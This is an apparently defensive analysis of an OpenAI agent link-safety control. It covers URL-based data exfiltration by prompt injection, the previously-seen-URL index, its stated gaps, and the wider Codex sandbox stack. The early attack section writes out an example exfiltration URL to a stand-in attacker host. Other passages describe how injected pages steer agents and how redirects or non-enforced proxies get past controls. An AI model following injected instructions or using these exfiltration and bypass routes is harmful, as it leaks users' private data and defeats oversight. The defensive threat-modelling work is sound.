OpenAI's Agent Link Safety Isolates the Fetch, Not Prompt Injection

OpenAI’s link-safety post from 2026-06-22 isolates one thing: the fetch. An independent web index decides which URLs an agent may load without asking, and any URL the index has not seen before surfaces a confirmation prompt. The control does not stop prompt injection, does not vet page content, and does not block malicious instructions. OpenAI says as much in the post itself, which is the part of the announcement most coverage will skip.

Is the link-safety sandbox a prompt-injection fix?

No. The mechanism is scoped to a single attack class, URL-based data exfiltration, and the post is explicit that the guarantee ends there.

The canonical attack the post describes is an attacker inducing the model to fetch a URL like https://attacker.example/collect?data=<something private>. The private value lands in the attacker’s server logs, and the user never sees the request because it can happen in the background, embedded as an image tag or triggered by a link preview. The leak is in the fetch, not in the reply. Prompt injection can force that load even when the model never says anything sensitive in chat.

That distinction is the reason the post exists. The traditional prompt-injection worry is that the model says something it shouldn’t. This attack is that the model reaches out and posts something it shouldn’t. A control that sits on the output filter cannot catch a leak that never passes through the output. It has to sit on the network path, and the asymmetry favors the attacker, who only needs one fetch to land in a log while the defender has to gate every fetch the agent makes.

The other half of why background fetches are the vector is that they do not surface in the chat UI. A user who would notice the model typing a credit card number into a reply will not notice the model loading an image whose URL contains that number. The link-safety layer is the control that exists precisely because the output channel cannot carry that signal.

How does the independent web index decide a URL is safe?

A URL is treated as safe to auto-fetch if OpenAI’s independent web index has seen it before; everything else gets a confirmation prompt.

The index is a crawler with no access to user conversations, recording public URLs. When an agent encounters a link, it auto-fetches only URLs the index has previously observed. For anything else, the product surfaces the warning: “The link isn’t verified. It may include information from your conversation. Make sure you trust it before proceeding.” Because the index never sees the conversation, it cannot be coerced into treating a URL that encodes private data as already public.

OpenAI considered and rejected trusted-site allow-lists, for two reasons. First, legitimate sites support redirects, so a request to a trusted domain can be forwarded to an attacker-controlled destination; a news site’s link shortener or tracking redirect becomes a redirect oracle an attacker can aim. Second, rigid lists generate false-alarm friction that trains users to click through warnings. The “previously seen” rule trades cryptographic certainty for the property the allow-list fails at: there is no static trust set for an attacker to redirect around, and the index observes exact URLs rather than trusting domains.

What does the link safeguard explicitly not cover?

The post scopes the guarantee narrowly and then names what it does not provide: trustworthy page content, protection from social engineering, and blocking of harmful on-page instructions.

There is also an implicit gap. The safeguard covers only the quiet URL fetch, so any other channel the agent uses to move data, from a tool call to a file write to the chat reply itself, sits outside its scope. OpenAI frames the safeguard as one layer in a defense-in-depth stack that also includes model-level mitigations, product controls, monitoring, and red-teaming. For a team whose threat model assumed “the agent sandbox handles injection,” that is the line to underline. The control stops the model from quietly exfiltrating via a crafted URL. It does not stop a fetched page from instructing the model to do something harmful, and it does not stop the model from acting on those instructions through other tools. A page the index has whitelisted can still carry a prompt injection, and once the agent has read it, the link-safety layer has no further opinion.

This is why the post matters as an architectural statement rather than a feature release. The guarantee is precise, and the precision is the value. Calling the fetch gate a “sandbox” is generous: a sandbox usually means a process and network boundary, and this layer is a URL allow rule with a confirmation prompt, enforced before any fetch happens.

Why is fetch-level isolation replacing prompt-level defenses?

Because the leak moves with the fetch, the control has to move with it. The post reflects a shift from guarding what the model says to guarding what the model touches.

The arXiv:2505.13076 threat model for browsing agents demonstrates this concretely. The paper, “The Hidden Dangers of Browsing AI Agents,” showed prompt injection, domain validation bypass, and credential exfiltration in Browser Use through a disclosed CVE and a proof of concept. Its proposed defenses are structural rather than prompt-level: planner-executor isolation and session safeguards. The argument the paper encodes is that you cannot reliably instruct a model into safety once it is reading attacker-controlled content, so you isolate the session instead. Planner-executor isolation separates the component that plans an action from the one that executes it, so an instruction injected into the executor does not automatically carry the planner’s full authority.

The agent-as-insider-threat framing runs the same direction. Rubrik’s analysis places the agent in a new insider-threat category: an agent with standing credentials moves data between systems without tripping behavioral flags designed for humans, touches thousands of records in seconds, and never deviates from its request patterns. A prompt-level defense does nothing about an agent that holds legitimate access and exercises it on behalf of a malicious page. Session isolation, scoped credentials, and per-fetch approval are the controls that do.

How does link safety fit the wider Codex and Agents sandbox stack?

The link-safety index is the lightest layer in a stack OpenAI published the same day, and conflating it with the heavier execution sandboxes is the easy mistake.

The Codex safety model pairs sandboxing with a managed network policy: allow expected destinations, block unwanted ones, and require approval for unfamiliar domains. Auto-review mode auto-approves low-risk actions through a subagent, and OpenTelemetry logs cover tool-approval decisions and network proxy allow and deny events. This is process-and-network isolation for code execution, a heavier control than a fetch gate.

The Codex Windows sandbox writeup carries the sharpest engineering lesson in the set. The team tried environment-variable network suppression, pointing HTTPS_PROXY at a dead endpoint, and found it was only “advisory.” Any program with its own networking stack, or one that ignored the proxy variable, could route around it. Their conclusion was that network suppression is too important to leave non-enforced.

The Sandbox Agents documentation formalizes the architecture as a harness and compute split. The harness is the control plane: the agent loop, tool routing, approvals, auth, billing, and audit. It runs in trusted infrastructure. The sandbox executes model-directed work with narrow credentials and mounts. Read against that split, the link-safety index is a harness-layer fetch policy, enforced before the agent’s work reaches the network. The Codex sandbox is the compute layer. They are different controls at different stages of the same agent action, and the same-day publication is the clearest signal that OpenAI is building isolation as a stack rather than as a single boundary.

What should agent teams change in their threat models today?

Stop modelling the prompt as the boundary. Start modelling the fetch and the session as the boundary.

Four moves, in rough priority:

Put the trust decision on the network path, and make it enforced. The Codex finding that advisory suppression is no suppression applies to any harness. If the agent’s network access can be bypassed by a process with its own stack, the isolation is decorative.
Scope credentials per session, not per agent. Rubrik’s insider-threat framing is the reason. An agent with broad standing access that behaves correctly is the exact profile behavioral analytics will not flag.
Treat “previously seen URL” as a default, not a guarantee. The index reduces exfiltration friction. A public URL can still carry instructions. Keep the confirmation prompt on unverified links, and log which URLs the agent fetched.
Separate the planner from the executor. The arXiv paper’s planner-executor isolation is the structural version of not letting the model that read the malicious page also hold the credentials.

None of this retires prompt-injection testing. OpenAI’s own scope statement is that the link safeguard is one layer, and the other layers (model mitigations, monitoring, red-teaming) still cover every attack class the fetch gate does not. The post is best read as the first published piece of a fetch-and-session isolation thesis: the boundary is migrating from model behavior to network policy, and the work for agent teams is to redraw their threat models before a fetched page redraws them first.

Frequently Asked Questions

How does the fetch gate differ from a Content Security Policy or an SSRF allow-list?

It is closer to a server-side SSRF control than to a browser CSP. CSP constrains what a rendered page may load inside the user’s browser; the link gate constrains what a server-side process that holds private context may fetch, which is the request-forgery problem. The architectural cousin is an egress proxy in front of a cloud metadata service, not a Content Security Policy header.

What gap does an egress proxy close that the URL index leaves open?

The gate inspects the URL string the agent is about to request. What it cannot see is the resolved destination after a redirect, the POST body or custom headers attached to the fetch, or a secret encoded into a query parameter. A proxy that terminates the egress connection and inspects the payload closes those gaps.

What should a team log alongside the fetch-gate decision?

Log the requested URL, the resolved final URL after any redirect, the approval decision, and the response status. OpenAI’s Codex stack already emits OpenTelemetry events for proxy allow and deny decisions, so pairing those with the gate’s pre-fetch verdict gives one trail covering both the policy decision and the real egress. Without the resolved URL, a redirect-based leak shows up as an approved fetch to a clean-looking host.

How does the Codex Auto-review subagent differ from the link index?

Auto-review delegates approval to a second model that reads the proposed action and judges it, so it can weigh context the index cannot. The tradeoff is that the reviewing subagent reads the same attacker-shaped content the primary agent did, which is why OpenAI scopes Auto-review to low-risk actions only. The link index makes a mechanical in-corpus check that no amount of social engineering bends.

What determines whether the confirmation prompt actually changes user behavior?

The base rate of novel-but-safe URLs the agent encounters. The previously-seen rule fires the prompt only for URLs the index has not observed, so on mainstream-site traffic the prompt is rare and users read it as signal. On long-tail research traffic where most fetches are novel, the prompt becomes routine and users click through, which is the warning-fatigue failure that sank static allow-lists.